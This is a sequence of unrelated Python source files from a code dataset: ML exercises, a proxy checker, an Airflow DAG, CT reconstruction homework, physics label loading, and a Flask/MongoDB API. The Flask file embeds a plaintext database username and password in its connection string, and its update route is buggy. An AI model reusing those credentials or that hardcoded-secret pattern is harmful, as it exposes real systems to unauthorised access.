list(directive.keys())\n if len(keys) != 1:\n raise ValueError('Expected directive dict to contain a single key: {}'.format(directive))\n return keys[0]\n\n\n\"\"\"\nThis is a python dictionary which declares the JSON schema for the \"document_info\"\ndirective appearing in Cascade word documents. \"JSON schema\" is a standardized\nformat for declaring constraints on the information present in a given JSON object.\nThis schema defines what constitutes a properly formed \"document_info\" directive.\n\n References:\n * http://json-schema.org/\n Definition of the \"JSON schema\" format\n\n * https://spacetelescope.github.io/understanding-json-schema/\n A very readable explanation of the \"JSON schema\" format\n\n * https://github.com/Julian/jsonschema\n The Python library used herein for \"JSON schema\" processing\n\n\"\"\"\nSCHEMA__DOCUMENT_INFO = {\n \"title\": \"(HEAD)\",\n \"type\": \"object\",\n \"properties\":{\n \"#document_info\":{\n \"type\": \"object\",\n \"properties\":{\n \"object_ids\":{\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\":{\n \"prefix\": {\n \"type\": \"string\",\n \"pattern\": \"^.+-$\"\n },\n \"next_id\": {\n \"type\": \"integer\"\n }\n },\n \"required\": [\"prefix\", \"next_id\"],\n \"additionalProperties\": False\n }\n },\n \"schemas\":{\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\":{\n \"title\":{\n \"type\": \"string\",\n \"pattern\": \"^(#shortform|#section|#requirement)$\"\n }\n },\n \"required\": [\"title\"]\n }\n },\n },\n \"required\": [\"object_ids\", \"schemas\"],\n \"additionalProperties\": False,\n },\n },\n \"required\": [\"#document_info\"],\n \"additionalProperties\": False\n}\n\nSCHEMA__PRAGMA = {\n \"title\": \"#pragma\",\n \"type\": \"string\"\n}\n\ndef validate_json(json_dict, schema):\n validation_passed = True\n try:\n jsonschema.validate(json_dict, schema)\n except jsonschema.exceptions.ValidationError as err:\n #TODO: Log validation error detail more cleanly\n qlog.error('JSON Validation Failed:\\n' + str(err))\n validation_passed = False\n return validation_passed\n\ndef uprint(text):\n \"\"\"Print Unicode do stdout, replacing errors for un-encodable characters\"\"\"\n print(text.encode(sys.stdout.encoding, errors='replace'))\n\ndef add_suffix_to_filename(filename, suffix_text):\n \"\"\"Append a suffix to a filename\n\n The name is appended before the file extension (if one exists)\n \n Examples:\n add_suffix_to_filename('my_file.txt', '_old') -> 'myfile_old.txt'\n add_suffix_to_filename('my_file', '_old') -> 'myfile_old'\n\n Args:\n filename: Filename string\n suffix_text: Attend string\n\n Returns\n Modified filename\n \"\"\"\n if not '.' in filename:\n return filename + suffix_text\n pieces = filename.split('.')\n return '.'.join(pieces[:-1]) + suffix_text + '.' + pieces[-1]\n\ndef make_output_file_info(out_filename, output_argument, append_suffix, replace_extension=None):\n ''' Determine the appropriate output filename and path for a Cascade command\n\n Arguments:\n out_filename:\n The nominal output filename. May also contain a full path. This is very\n typically the input filename combined with an append_suffix option.\n output_argument:\n The output filename command line argument (in the case of the http interface,\n the command line argument is used to inject the target output directory).\n May be a path, a filename, or a path and a filename. If a path and/or\n filename is specified, then they each individually OVERRIDE the path and filename\n specified by out_filename.\n append_suffix:\n Will be appended to out_filename (before its file extension) BEFORE output_argument\n is parsed (which could override the out_filename)\n e.g. out_filename='test.txt' append_suffix='_NEW' => 'test_NEW.txt'\n replace_extension:\n If supplied, replaces the extension of out_filename BEFORE output_argument\n is parsed (which could override the out_filename)\n e.g. out_filename='test.txt' replace_extension='rst' => 'test.rst'\n\n Returns:\n A dict containing 'path', 'filename', 'path_and_filename'\n '''\n out_path, out_filename = os.path.split(out_filename)\n if append_suffix:\n out_filename = add_suffix_to_filename(out_filename, append_suffix)\n\n if replace_extension:\n out_filename = '.'.join(out_filename.split('.')[:-1]) + '.' + replace_extension\n\n if output_argument:\n if os.path.isdir(output_argument):\n # Output specified a path only.\n out_path = output_argument\n else:\n # Output specified either a file or a path and file\n out_path, out_filename = os.path.split(output_argument)\n\n return dict(\n path=out_path,\n filename=out_filename,\n path_and_filename=os.path.join(out_path, out_filename)\n )\n","repo_name":"epmoyer/cascade","sub_path":"web/cascade/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28431224049","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nfrom matplotlib import pyplot as plt\nfrom LinearRegressionSkeleton import LinearRegression\n\niris = load_iris()\nlin_reg = LinearRegression(lr=0.1)\n\ndf = pd.DataFrame(iris.data, columns=iris.feature_names)\n\nX = df[\"petal width (cm)\"].values\ny = df['sepal length (cm)'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\nlin_reg.fit(X_train, y_train)\n\npreds = []\nfor x in X_test:\n preds.append(lin_reg.predict(x))\n\nprint(\"Mean Absolute Error:\", np.mean(np.abs(preds - y_test)))\nprint(\"Mean Squared Error:\", np.mean((preds - y_test)**2))\n\nplt.scatter(X_test, y_test)\nplt.plot([min(X_test), max(X_test)], [min(preds), max(preds)], color='red') # predicted\nplt.show()\n","repo_name":"KareszD/BEVADAT2022232","sub_path":"GYAK/GYAK08/GYAK08.py","file_name":"GYAK08.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"139474381","text":"from flask import Flask, make_response,request,jsonify\r\nfrom flask_mongoengine import MongoEngine\r\n\r\n\r\napp = Flask(__name__)\r\napp.config[\"MONGODB_HOST\"] = \"mongodb+srv://haythem:haythem@cluster0.q4qnp.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\r\ndb = MongoEngine()\r\ndb.init_app(app)\r\n\r\n\r\nclass Product(db.Document):\r\n prod_id = db.IntField()\r\n Title = db.StringField()\r\n Color = db.StringField()\r\n Price = db.StringField()\r\n\r\n\r\n def to_json(self):\r\n #convert le document en JSON\r\n return {\r\n \"prod_id\": self.prod_id,\r\n \"Title\": self.Title,\r\n \"Color\": self.Color,\r\n \"Price\": self.Price\r\n }\r\n \r\n@app.route('/api/create_product',methods=['POST'])\r\ndef create_product():\r\n prod = Product(prod_id= 15, Title= \"Nike Air Force 1\",Color= \"White\", Price=\"120\")\r\n prod.save()\r\n return make_response(\"\",201)\r\n\r\n@app.route('/api/products',methods=['GET','POST'])\r\ndef api_products():\r\n if request.method == \"GET\": \r\n products = []\r\n for product in Product.objects:\r\n products.append(product)\r\n return make_response(jsonify(products),200)\r\n elif request.method == \"POST\": \r\n content = request.json\r\n product = Product(prod_id=content['prod_id'],\r\n Title=content['Title'],\r\n Color=content['Color'],\r\n Price=content['Price'])\r\n product.save()\r\n return make_response(\"Produit enregistré\",201)\r\n\r\n \r\n\r\n@app.route('/api/products/',methods=['GET','PUT','DELETE'])\r\ndef api_each_prod(prod_id):\r\n \r\n if request.method == \"GET\":\r\n product_obj = Product.objects(prod_id=prod_id).first()\r\n return make_response(jsonify(product_obj.to_json()),200)\r\n \r\n\r\n \r\n elif request.method == \"PUT\":\r\n product_obj = Product.objects(prod_id=prod_id).first()\r\n product_obj.update(prod_id=1,Title=\"Adidas\",Color=\"Black\",Price=\"156\")\r\n return make_response(\"Produit modifier\",500)\r\n\r\n\r\n elif request.method == \"DELETE\":\r\n product_obj = Product.objects(prod_id=prod_id).first()\r\n product_obj.delete()\r\n return make_response(\"Produit supprimé\",500)\r\n \r\nif __name__ == '__main__':\r\n app.run()\r\n \r\n","repo_name":"Haythem97/unittest_py","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30868861541","text":"## Categorize New Member\r\n## 7 kyu\r\n## https://www.codewars.com/kata/5502c9e7b3216ec63c0001aa\r\n\r\n\r\ndef openOrSenior(data):\r\n newlist = []\r\n for item in data:\r\n if item[0] > 54 and item[1] > 7:\r\n newlist.append(\"Senior\")\r\n else:\r\n newlist.append(\"Open\")\r\n return newlist","repo_name":"stereoabuse/codewars","sub_path":"problems/categorize_new_member.py","file_name":"categorize_new_member.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37680686670","text":"import requests,json,time,threading\n\n\nlock=threading.Lock()\nhead = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0\",\n\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n\"Accept-Language\":\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n\"Accept-Encoding\":\"gzip, deflate, br\"}\n\ngoodips=[]\ntestbot=[]\nbotnum=0\novernum=0\njs=[]\n\ndef test():\n global js,head,botnum,overnum\n while not len(js)==0:\n testing = js.pop(0)\n proxy={testing[\"http\"]:testing[\"IP\"]}\n try:\n t1=time.time()\n html = requests.head(\"http://www.baidu.com\",headers=head,proxies=proxy,timeout=10)\n t2=time.time()\n t=t2-t1\n if not html.status_code == 200:\n raise TimeoutError\n except Exception:\n pass\n else:\n goodips.append(testing)\n finally:\n overnum+=1\n # time.sleep(1)\n botnum-=1\n\n\ndef main(inPut=\"./ips.json\",outPut=\"./goodips.json\"):\n global testing,js,botnum,overnum\n with open(inPut,\"r\")as file:\n js=json.load(file)\n ipnum = len(js)\n print(\"共\",len(js),\"个\")\n\n for i in range(256):\n testbot.append(threading.Thread(target=test))\n botnum+=1\n\n for i in testbot:\n i.setDaemon(True)\n \n for i in testbot:\n i.start()\n\n while not botnum==0:\n percentage =int((overnum / ipnum)*100)\n print(\" [\"+\"▉\"*percentage+\"-\"*(100-percentage)+\"]\"+str(percentage)+\"% \"\\\n +\"已完成\"+str(overnum)+\"/\"+str(ipnum)+\"个,\"\\\n +str(len(goodips))+\"个可用\",end=\"\\r\")\n \n with open(outPut,\"w\")as file:\n json.dump(goodips,fp=file)\n\n print(\"\\ndone\")\n print(\"共\",len(goodips),\"个可用\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"lesiwo/get-requests-proxy-python","sub_path":"testip2.py","file_name":"testip2.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31459268193","text":"i=0\n\naccumuX=0\naccumuY=0\n\nwhile i in range(0,2):#While que pedirá dos veces la posiciones de x e y para después restarlos y saber la distancia entre ellos\n x=int(input(str((i+1))+\"º número de x: \"))\n accumuX=abs(accumuX-x)\n y=int(input(str((i+1))+\"º número de y: \"))\n accumuY=abs(accumuY-y)\n i=i+1\n\nprint(\"La distancia entre ello es \"+str(accumuX)+\"x\"+str(accumuY)+\"y\")#Mensaje con la solución","repo_name":"BPA-SER-2223/Programacion_DAM","sub_path":"Practica 3/Ejercicio12.py","file_name":"Ejercicio12.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19183318694","text":"def dosomething(x):\n if x == 5:\n print('Fifth')\n else:\n print('Hell')\n\n if x == 7:\n print('Seventh')\n else:\n print('Heaven')\n\n\nimport dis\ndis.dis(dosomething)\n\n# How hard is to test (and understand) this function?\n# https://en.wikipedia.org/wiki/Cyclomatic_complexity\ncomplexity = 1\nfor i in dis.get_instructions(dosomething):\n complexity += int('JUMP_IF' in i.opname or 'FOR_ITER' == i.opname)\n\nprint(complexity)\n\n# 7 is usually considered a threshold over which we should split the function\nif complexity > 7:\n print('You should refactor!')\n","repo_name":"amol-/blackhole","sub_path":"02_cyclomatic.py","file_name":"02_cyclomatic.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17299369214","text":"from airflow import DAG,Dataset\nfrom airflow.decorators import task\n\nfrom datetime import datetime\n\nfile= Dataset(\"/tmp/new_file.csv\")\n\nwith DAG (\n dag_id=\"dataset_producer\",\n schedule=\"@daily\",\n start_date=datetime(2023,1,1),\n catchup=False):\n \n @task(outlets=[file])\n def update_data():\n with open(file.uri, \"a+\") as f:\n f.write(\"new data\")\n \n update_data()","repo_name":"technoavengers/airflow-training","sub_path":"dags/datasets/dataset_producer_dag.py","file_name":"dataset_producer_dag.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37207238764","text":"from os.path import join\nimport pyelsa as elsa\nimport aomip\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.image as mig\nimport utils\nimport matplotlib.pyplot as plt\n\n## Prepare data\nlocal=True\n\ndata_path = '/srv/ceph/share-all/aomip/2686726_Walnut1/Walnut1/Projections/tubeV1'\nprojs_name = 'scan_{:06}.tif'\ndark_name = 'di000000.tif'\nflat_name = ['io000000.tif', 'io000001.tif']\nvecs_name = 'scan_geom_corrected.geom'\nprojs_rows = 972\nprojs_cols = 768\n\n# projection file indices, we need to read in the projection in reverse order due to the portrait mode acquision\nprojs_idx = range(1200,0, -1)\n\nnum_projections = 1200 #vecs.shape[0]\n\n# create the numpy array which will receive projection data from tiff files\nprojs = np.zeros((num_projections, projs_rows, projs_cols), dtype=np.float32)\n\n# Changing orientation from landscape to portrait mode\ntrafo = lambda image : np.transpose(np.flipud(image))\n\n# load flat-field and dark-fields\n# there are two flat-field images (taken before and after acquisition), we simply average them\ndark = trafo(plt.imread(join(data_path, dark_name)))\nflat = np.zeros((2, projs_rows, projs_cols), dtype=np.float32)\n\n# Combine avereate of the flat field image\nfor i, fn in enumerate(flat_name):\n flat[i] = trafo(plt.imread(join(data_path, fn)))\nflat = np.mean(flat,axis=0)\n\n# load projection data\nfor i in range(num_projections):\n projs[i] = trafo(plt.imread(join(data_path, projs_name.format(projs_idx[i]))))\n\n\"\"\" Homework 1: preprocessing with slicing\"\"\"\n\"\"\" Start \"\"\"\n\nslice_idx_50 = 50\nslice_idx_100 = 100\nslice_idx_200 = 200\nslice_idx_400 = 400\nslice_idx_800 = 800\n\nsliced_sinogram_50 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_100 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_200 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_400 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_800 = np.empty((num_projections, projs_cols), dtype=np.float32)\n\nfor i in range(num_projections):\n proj=projs[i]\n \n #slice row 50 for every projection\n row_50 = proj[slice_idx_50, :]\n sliced_sinogram_50[i, :] = row_50\n \n #slice row 100 for every projection\n row_100 = proj[slice_idx_100, :]\n sliced_sinogram_100[i, :] = row_100\n \n #slice row 200 for every projection\n row_200 = proj[slice_idx_200, :]\n sliced_sinogram_200[i, :] = row_200\n \n #slice row 400 for every projection\n row_400 = proj[slice_idx_400, :]\n sliced_sinogram_400[i, :] = row_400\n \n #slice row 800 for every projection\n row_800 = proj[slice_idx_800, :]\n sliced_sinogram_800[i, :] = row_800\n\nutils.save_array_as_image(sliced_sinogram_50,'sliced_sinogram.png','Img')\nutils.save_array_as_image(sliced_sinogram_100,'sliced_sinogram.png','Img')\nutils.save_array_as_image(sliced_sinogram_200,'sliced_sinogram.png','Img')\nutils.save_array_as_image(sliced_sinogram_400,'sliced_sinogram.png','Img')\nutils.save_array_as_image(sliced_sinogram_800,'sliced_sinogram.png','Img')\n\n\"\"\" End \"\"\"\n\n\"\"\" Homework 3: Solving CT Problems \"\"\"\n\"\"\" Start \"\"\"\n\ndef f(A,b,x):\n return 0.5* np.linalg.norm(A.dot(x) - b)**2\n\ndef gradientDescent(function,A,b, x0, iterations):\n x = x0\n history = np.zeros((x0.size, iterations+1))\n history[:, 0] = x0\n \n value0 = function(A,b,x0)\n values = np.zeros(iterations+1)\n values[0] = value0\n \n for i in range(iterations):\n d = A.T.dot(A.dot(x)-b)\n alpha = (d.T).dot(d) / (d.T).dot(A).dot(d)\n x = x - alpha*d\n history[:,i+1] = x\n _, _, values[i] = function(A,b,x)\n \n return history, values\n\nsize = (projs_rows,projs_cols)\nA = aomip.XrayOperator(size, [721], np.linspace(0, 360, projs_cols), size[0]*100, size[0]*2)\nb = sliced_sinogram_200.flatten()\ninitial_x0 = np.array(np.zeros(projs_rows*projs_cols))\nhist, minv = gradientDescent(f,A,b,initial_x0,1000)\niteration = 100\nhist, minv = gradientDescent(f,A,b,initial_x0,iteration)\nxreconstructed = (hist[iteration]).reshape(size)\nutils.save_array_as_image(sliced_sinogram_50,'reconstructed_sinogram_200.png','Img')\n\n\"\"\" End \"\"\"","repo_name":"kzboey/Applied-Optimization-for-Inverse-Problem","sub_path":"aomip-boey-kai-zhe/homework/hw02/script_old.py","file_name":"script_old.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24819403932","text":"from __future__ import division, print_function\n\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom egenerator import misc\nfrom egenerator.manager.component import BaseComponent, Configuration\nfrom egenerator.data.tensor import DataTensorList, DataTensor\nfrom egenerator.utils.cascades import shift_to_maximum\n\n\nclass SnowstormTrackGeneratorLabelModule(BaseComponent):\n\n \"\"\"This is a label module that loads the snowstorm track labels.\n \"\"\"\n\n def __init__(self, logger=None):\n \"\"\"Initialize track module\n\n Parameters\n ----------\n logger : logging.logger, optional\n A logging instance.\n \"\"\"\n\n logger = logger or logging.getLogger(__name__)\n super(SnowstormTrackGeneratorLabelModule, self).__init__(\n logger=logger)\n\n def _configure(self, config_data, shift_cascade_vertex, trafo_log,\n float_precision,\n num_cascades=5,\n label_key='EventGeneratorMuonTrackLabels',\n snowstorm_key='SnowstormParameters',\n num_snowstorm_params=30):\n \"\"\"Configure Module Class\n This is an abstract method and must be implemented by derived class.\n\n Parameters\n ----------\n config_data : None, str, or DataTensorList\n This is either the path to a test file or a data tensor list\n object. The module will be configured with this.\n shift_cascade_vertex : bool\n Shift cascade vertex to shower maximum instead of interaction\n point.\n trafo_log : None or bool or list of bool\n Whether or not to apply logarithm on parameters.\n If a single bool is given, this applies to all labels. Otherwise\n a list of bools corresponds to the labels in the order:\n zenith, azimuth,\n track_anchor_x, track_anchor_y, track_anchor_z,\n track_anchor_time, track_energy,\n track_distance_start, track_distance_end,\n track_stochasticity,\n cascade_0000_energy,\n cascade_{i:04d}_energy, cascade_{i:04d}_distance,\n Snowstorm parameters must not be defined here. No logarithm will be\n applied to the snowstorm parameters.\n float_precision : str\n The float precision as a str.\n num_cascades : int, optional\n Number of cascades along the track.\n label_key : str, optional\n The name of the key under which the labels are saved.\n snowstorm_key : str, optional\n The name of the key under which the snowstorm parameters are saved.\n If `snowstorm_key` is None, no snowstorm parameters will be loaded.\n Instead a default value of 1. will be assigned to each of the\n `num_snowstorm_params` number of snowstorm parameters.\n num_snowstorm_params : int, optional\n The number of varied snowstorm parameters.\n\n Returns\n -------\n Configuration object\n The configuration object of the newly configured component.\n This does not need to include configurations of sub components\n which are passed directly as parameters into the configure method,\n as these are automatically gathered. Components passed as lists,\n tuples, and dicts are also collected, unless they are nested\n deeper (list of list of components will not be detected).\n The dependent_sub_components may also be left empty for these\n passed and detected sub components.\n Deeply nested sub components or sub components created within\n (and not directly passed as an argument to) this component\n must be added manually.\n Settings that need to be defined are:\n class_string:\n misc.get_full_class_string_of_object(self)\n settings: dict\n The settings of the component.\n mutable_settings: dict, default={}\n The mutable settings of the component.\n check_values: dict, default={}\n Additional check values.\n dict\n The data of the component. Contains:\n 'label_tensors': DataTensorList\n The tensors of type 'label' that will be loaded.\n dict\n A dictionary of dependent sub components. This is a dictionary\n of sub components that need to be saved and loaded recursively\n when the component is saved and loaded.\n Return None if no dependent sub components exist.\n\n Raises\n ------\n TypeError\n Description\n ValueError\n Description\n \"\"\"\n\n # sanity checks:\n if not isinstance(shift_cascade_vertex, bool):\n raise TypeError('{!r} is not a boolean value!'.format(\n shift_cascade_vertex))\n if num_cascades < 0:\n raise ValueError('Num cascades {} must be positive!'.format(\n num_cascades))\n\n # compute number of parameters\n if num_cascades == 0:\n num_params = 10\n elif num_cascades == 1:\n num_params = 11\n else:\n num_params = 11 + (num_cascades - 1) * 2\n\n # create list of parameter names which is needed for data loading\n parameter_names = [\n 'zenith', 'azimuth',\n 'track_anchor_x', 'track_anchor_y', 'track_anchor_z',\n 'track_anchor_time', 'track_energy',\n 'track_distance_start', 'track_distance_end',\n 'track_stochasticity',\n ]\n if num_cascades >= 1:\n parameter_names.append('cascade_0000_energy')\n\n if num_cascades > 1:\n for i in range(1, num_cascades):\n parameter_names.append('cascade_{:04d}_energy'.format(i))\n parameter_names.append('cascade_{:04d}_distance'.format(i))\n\n parameter_dict = {}\n for i, parameter_name in enumerate(parameter_names):\n parameter_dict[parameter_name] = i\n\n # extend trafo log for snowstorm parameters: fill with Flase\n if isinstance(trafo_log, bool):\n trafo_log_ext = [trafo_log] * num_params\n else:\n trafo_log_ext = list(trafo_log)\n trafo_log_ext.extend([False]*num_snowstorm_params)\n\n data = {\n 'parameter_dict': parameter_dict,\n 'parameter_names': parameter_names,\n }\n data['label_tensors'] = DataTensorList([DataTensor(\n name='x_parameters',\n shape=[None, num_params + num_snowstorm_params],\n tensor_type='label',\n dtype=float_precision,\n trafo=True,\n trafo_log=trafo_log_ext)])\n\n if isinstance(config_data, DataTensorList):\n if config_data != data['label_tensors']:\n msg = 'Tensors are wrong: {!r} != {!r}'\n raise ValueError(msg.format(config_data,\n data['label_tensors']))\n configuration = Configuration(\n class_string=misc.get_full_class_string_of_object(self),\n settings=dict(config_data=config_data,\n shift_cascade_vertex=shift_cascade_vertex,\n trafo_log=trafo_log,\n float_precision=float_precision,\n num_cascades=num_cascades,\n label_key=label_key,\n snowstorm_key=snowstorm_key,\n num_snowstorm_params=num_snowstorm_params))\n return configuration, data, {}\n\n def get_data_from_hdf(self, file, *args, **kwargs):\n \"\"\"Get label data from hdf file.\n\n Parameters\n ----------\n file : str\n The path to the hdf file.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n\n Returns\n -------\n int\n Number of events.\n tuple of array-like tensors or None\n The input data (array-like) as specified in the\n DataTensorList (self.tensors).\n Returns None if no label data is loaded.\n\n Raises\n ------\n ValueError\n Description\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n # open file\n f = pd.HDFStore(file, 'r')\n\n track_parameters = []\n try:\n _labels = f[self.configuration.config['label_key']]\n for l in self.data['parameter_names']:\n track_parameters.append(_labels[l])\n\n snowstorm_key = self.configuration.config['snowstorm_key']\n num_params = self.configuration.config['num_snowstorm_params']\n num_events = len(track_parameters[0])\n\n if num_params > 0:\n if snowstorm_key is not None:\n _snowstorm_params = f[snowstorm_key]\n params = _snowstorm_params['item']\n index = _snowstorm_params['vector_index']\n assert max(index) == num_params - 1\n assert min(index) == 0\n\n for i in range(num_params):\n\n snowstorm_param = params[index == i]\n assert len(snowstorm_param) == num_events\n track_parameters.append(snowstorm_param)\n\n else:\n # No Snowstorm key is provided: add dummy values\n for i in range(num_params):\n track_parameters.append(np.ones(num_events))\n\n except Exception as e:\n self._logger.warning(e)\n self._logger.warning('Skipping file: {}'.format(file))\n return None, None\n finally:\n f.close()\n\n # shift cascade vertices to shower maximum?\n if self.configuration.config['shift_cascade_vertex']:\n track_parameters = self._shift_parameters(track_parameters)\n\n # format track parameters\n dtype = getattr(np, self.configuration.config['float_precision'])\n track_parameters = np.array(track_parameters, dtype=dtype).T\n num_events = len(track_parameters)\n\n return num_events, (track_parameters,)\n\n def get_data_from_frame(self, frame, *args, **kwargs):\n \"\"\"Get label data from frame.\n\n Parameters\n ----------\n frame : I3Frame\n The I3Frame from which to get the data.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n\n Returns\n -------\n int\n Number of events.\n tuple of array-like tensors or None\n The input data (array-like) as specified in the\n DataTensorList (self.tensors).\n Returns None if no label data is loaded.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n track_parameters = []\n try:\n _labels = frame[self.configuration.config['label_key']]\n for l in self.data['parameter_names']:\n track_parameters.append(np.atleast_1d(_labels[l]))\n\n snowstorm_key = self.configuration.config['snowstorm_key']\n num_params = self.configuration.config['num_snowstorm_params']\n num_events = len(track_parameters[0])\n\n if num_params > 0:\n if snowstorm_key is not None:\n _snowstorm_params = frame[snowstorm_key]\n assert len(_snowstorm_params) == num_params\n\n for i in range(num_params):\n\n snowstorm_param = np.atleast_1d(_snowstorm_params[i])\n assert len(snowstorm_param) == num_events\n track_parameters.append(snowstorm_param)\n\n else:\n # No Snowstorm key is provided: add dummy values\n for i in range(num_params):\n track_parameters.append(np.ones(num_events))\n\n except Exception as e:\n self._logger.warning(e)\n self._logger.warning('Skipping frame: {}'.format(frame))\n return None, None\n\n # shift cascade vertices to shower maximum?\n if self.configuration.config['shift_cascade_vertex']:\n track_parameters = self._shift_parameters(track_parameters)\n\n # format track parameters\n dtype = getattr(np, self.configuration.config['float_precision'])\n track_parameters = np.array(track_parameters, dtype=dtype).T\n num_events = len(track_parameters)\n\n return num_events, (track_parameters,)\n\n def create_data_from_frame(self, frame, *args, **kwargs):\n \"\"\"Create label data from frame.\n\n Parameters\n ----------\n frame : I3Frame\n The I3Frame from which to get the data.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n\n Returns\n -------\n int\n Number of events.\n tuple of array-like tensors or None\n The input data (array-like) as specified in the\n DataTensorList (self.tensors).\n Returns None if no label data is created.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n return self.get_data_from_frame(frame, *args, **kwargs)\n\n def write_data_to_frame(self, data, frame, *args, **kwargs):\n \"\"\"Write label data to I3Frame.\n\n Parameters\n ----------\n data : tuple of array-like tensors\n The input data (array-like) as specified in the\n DataTensorList (self.data['data_tensors']).\n frame : I3Frame\n The I3Frame to which the data is to be written to.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n pass\n\n def _shift_parameters(self, parameters):\n \"\"\"Adjust parameters due to shifting of cascades to shower maximum.\n\n Parameters\n ----------\n parameters : list of array\n The parameters that should be shifted.\n\n Returns\n -------\n list of array\n The shifted parameters\n \"\"\"\n num_cascades = self.configuration.config['num_cascades']\n param_dict = self.data['parameter_dict']\n\n zenith = parameters[param_dict['zenith']]\n azimuth = parameters[param_dict['azimuth']]\n\n c = 0.299792458 # meter / ns\n dir_x = -np.sin(zenith) * np.cos(azimuth)\n dir_y = -np.sin(zenith) * np.sin(azimuth)\n dir_z = -np.cos(zenith)\n\n # fix anchor point of track which is the first provided cascade\n # This means that the start and end distance of the track segment\n # must also be adjusted\n if num_cascades > 0:\n shift = self._get_cascade_extension(\n parameters[param_dict['cascade_0000_energy']])\n\n parameters[param_dict['track_anchor_x']] += dir_x * shift\n parameters[param_dict['track_anchor_y']] += dir_y * shift\n parameters[param_dict['track_anchor_z']] += dir_z * shift\n parameters[param_dict['track_anchor_time']] += shift / c\n\n parameters[param_dict['track_distance_start']] -= shift\n parameters[param_dict['track_distance_end']] -= shift\n\n # Also shift all of the remaining cascades\n for i in range(1, num_cascades):\n shift_i = self._get_cascade_extension(\n parameters[param_dict['cascade_{:04d}_energy'.format(i)]])\n\n # get index of cascade distance parameter\n dist_index = param_dict['cascade_{:04d}_distance'.format(i)]\n\n # we need to compensate for the shift of the anchor point\n parameters[dist_index] -= shift\n\n # and also for the shift of the ith cascade itself\n parameters[dist_index] += shift_i\n\n return parameters\n\n def _get_cascade_extension(self, ref_energy, eps=1e-6):\n \"\"\"\n PPC does its own cascade extension, leaving the showers at the\n production vertex. Reapply the parametrization to find the\n position of the shower maximum, which is also the best approximate\n position for a point cascade.\n\n Parameters\n ----------\n ref_energy : array_like\n Energy of cascade in GeV.\n eps : float, optional\n Small constant float.\n\n Returns\n -------\n array_like\n Distance of shower maximum to cascade vertex in meter.\n \"\"\"\n\n # Radiation length in meters, assuming an ice density of 0.9216 g/cm^3\n l_rad = (0.358/0.9216) # in meter\n\n \"\"\"\n Parameters taken from I3SimConstants (for particle e-):\n https://code.icecube.wisc.edu/projects/icecube/browser/IceCube/\n meta-projects/combo/trunk/sim-services/private/\n sim-services/I3SimConstants.cxx\n \"\"\"\n a = 2.01849 + 0.63176 * np.log(ref_energy + eps)\n b = l_rad/0.63207\n\n # Mode of the gamma distribution gamma_dist(a, b) is: (a-1.)/b\n length_to_maximum = np.clip(((a-1.)/b)*l_rad, 0., float('inf'))\n return length_to_maximum\n\n def _shift_to_maximum(self, x, y, z, zenith, azimuth, ref_energy, t,\n eps=1e-6):\n \"\"\"\n PPC does its own cascade extension, leaving the showers at the\n production vertex. Reapply the parametrization to find the\n position of the shower maximum, which is also the best approximate\n position for a point cascade.\n\n Parameters\n ----------\n x : float or np.ndarray of floats\n Cascade interaction vertex x (unshifted) in meters.\n y : float or np.ndarray of floats\n Cascade interaction vertex y (unshifted) in meters.\n z : float or np.ndarray of floats\n Cascade interaction vertex z (unshifted) in meters.\n zenith : float or np.ndarray of floats\n Cascade zenith direction in rad.\n azimuth : float or np.ndarray of floats\n Cascade azimuth direction in rad.\n ref_energy : float or np.ndarray of floats\n Energy of cascade in GeV.\n t : float or np.ndarray of floats\n Cascade interaction vertex time (unshifted) in ns.\n eps : float, optional\n Small constant float.\n\n Returns\n -------\n Tuple of float or tuple of 